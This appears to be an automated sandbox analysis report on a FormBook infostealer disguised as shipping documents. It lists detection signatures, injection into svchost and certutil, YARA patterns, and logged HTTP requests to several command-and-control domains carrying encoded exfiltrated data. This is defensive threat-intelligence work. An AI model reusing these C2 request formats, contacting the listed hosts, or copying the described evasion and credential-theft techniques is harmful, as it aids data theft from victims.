Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documente de expediere.exe

Overview

General Information

Sample name:Documente de expediere.exe
Analysis ID:1477464
MD5:3ed2eca087936d7ab479ce62c50a9f2a
SHA1:0616bdb97bf793a387359ca33a089b328d131519
SHA256:42b9ac8b067460277e68574662bc607f84664a9c622608dec68e62e608dc9444
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Documente de expediere.exe (PID: 4092 cmdline: "C:\Users\user\Desktop\Documente de expediere.exe" MD5: 3ED2ECA087936D7AB479CE62C50A9F2A)
    • svchost.exe (PID: 400 cmdline: "C:\Users\user\Desktop\Documente de expediere.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • QAWHbhvedb.exe (PID: 396 cmdline: "C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • certutil.exe (PID: 7364 cmdline: "C:\Windows\SysWOW64\certutil.exe" MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
          • QAWHbhvedb.exe (PID: 6392 cmdline: "C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7584 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2aae0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x25760a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x240c49:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d0e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16722:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dee3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17522:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Process Parents
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe" , CommandLine: "C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe, NewProcessName: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe, OriginalFileName: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe, ParentCommandLine: "C:\Windows\SysWOW64\certutil.exe", ParentImage: C:\Windows\SysWOW64\certutil.exe, ParentProcessId: 7364, ParentProcessName: certutil.exe, ProcessCommandLine: "C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe" , ProcessId: 6392, ProcessName: QAWHbhvedb.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Documente de expediere.exe", CommandLine: "C:\Users\user\Desktop\Documente de expediere.exe", CommandLine|base64offset|contains: u, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Documente de expediere.exe", ParentImage: C:\Users\user\Desktop\Documente de expediere.exe, ParentProcessId: 4092, ParentProcessName: Documente de expediere.exe, ProcessCommandLine: "C:\Users\user\Desktop\Documente de expediere.exe", ProcessId: 400, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Documente de expediere.exe", CommandLine: "C:\Users\user\Desktop\Documente de expediere.exe", CommandLine|base64offset|contains: u, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Documente de expediere.exe", ParentImage: C:\Users\user\Desktop\Documente de expediere.exe, ParentProcessId: 4092, ParentProcessName: Documente de expediere.exe, ProcessCommandLine: "C:\Users\user\Desktop\Documente de expediere.exe", ProcessId: 400, ProcessName: svchost.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-21T13:32:06.994854+0200
            SID:2050745
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:33:33.452707+0200
            SID:2050745
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:34:00.273875+0200
            SID:2050745
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:32:39.957553+0200
            SID:2050745
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:32:53.501283+0200
            SID:2050745
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:31:53.199532+0200
            SID:2050745
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:33:46.714145+0200
            SID:2050745
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:32:21.613906+0200
            SID:2050745
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:31:10.500548+0200
            SID:2050745
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:33:06.685839+0200
            SID:2050745
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:34:32.188050+0200
            SID:2050745
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:31:39.802184+0200
            SID:2050745
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-21T13:33:19.877840+0200
            SID:2050745
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Documente de expediere.exeReversingLabs: Detection: 73%
            Source: Documente de expediere.exeVirustotal: Detection: 50%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Documente de expediere.exeJoe Sandbox ML: detected
            Source: Documente de expediere.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QAWHbhvedb.exe, 0000000D.00000002.3704141726.0000000000B0E000.00000002.00000001.01000000.00000005.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1609949459.0000000000B0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Documente de expediere.exe, 00000000.00000003.1253941006.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Documente de expediere.exe, 00000000.00000003.1256736614.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430299412.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428303783.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.000000000319E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.00000000055E0000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.000000000577E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1544921671.0000000005438000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1541505660.000000000528A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Documente de expediere.exe, 00000000.00000003.1253941006.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Documente de expediere.exe, 00000000.00000003.1256736614.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1430299412.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428303783.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.000000000319E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, certutil.exe, 0000000E.00000002.3714307025.00000000055E0000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.000000000577E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1544921671.0000000005438000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1541505660.000000000528A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: certutil.pdb source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3715079219.0000000005C0C000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000002B3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1899080068.0000000001CDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3715079219.0000000005C0C000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000002B3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1899080068.0000000001CDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: certutil.pdbGCTL source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_006F4696
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FC93C FindFirstFileW,FindClose,0_2_006FC93C
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006FC9C7
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006FF200
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006FF35D
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006FF65E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006F3A2B
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006F3D4E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006FBF27
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032BBE20 FindFirstFileW,FindNextFileW,FindClose,14_2_032BBE20
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 4x nop then xor eax, eax14_2_032A97C0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 4x nop then mov ebx, 00000004h14_2_05430548
            Source: Joe Sandbox ViewIP Address: 103.168.172.37 103.168.172.37
            Source: Joe Sandbox ViewIP Address: 103.168.172.37 103.168.172.37
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_007025E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007025E2
            Source: global trafficHTTP traffic detected: GET /5yb0/?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.italyuntold.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sgjw/?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.funnelkakes.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /knjl/?5HE=HK1J84a27gkQ4beEKC61UbBVEOGAatJ0tiVbzvXViKVP6nm44mJHR8I5ZHuKj7DoAb3eP5+6cpVF46y42P5lmjxSIvkSYBgtFYg212IX7KyLN1Uz7dQ5iXPzMiB/yXbJ01avbd6tiSoS&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.shiybalinks.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xm40/?5HE=daAh1PvHixV61uAQZMYKPaNePBcxkEwbh0Ym6iIWO855OlL+0fA+LsjnAgtj7WyOZoCeoLSk25i6sMGFDrtEZ/sdfpdR1CdNhpbdr9VgkorBlDalMPv+Xn4VuwyhQF+VdIAPT792X8nN&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.olhadeputat.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jleabres.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.evoolihubs.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fardehb.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rjez/?5HE=bn6Kcb/G7NRz+77UcQJW4qLiu1GocAgaZTa4wjHl00pV2XIs1a9SZ4czJq6TxPof2hMjxPpppayxuFpboBicziwpjYC97Q/w/47U8Wa1V0+MlpjcY/2kLWYOIWUc1P6D3HPWzK7wcq5j&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.sehraji.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ecoaxion.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vqsg/?5HE=oEbg7hQU3MdCAI1Qzg6FnUbuYrpcD6PCFR/op5n6toe9jhHpPI7gLsdW3wxEsJ1FGff0/+qDBwgK/n9QPqrWSnFVgwucvZm42LyzbELDPU/Ii2JDfpNRbGk3upTzOCY2A4WqGnxtTcSM&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.809934.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /5jc8/?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.betano627.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
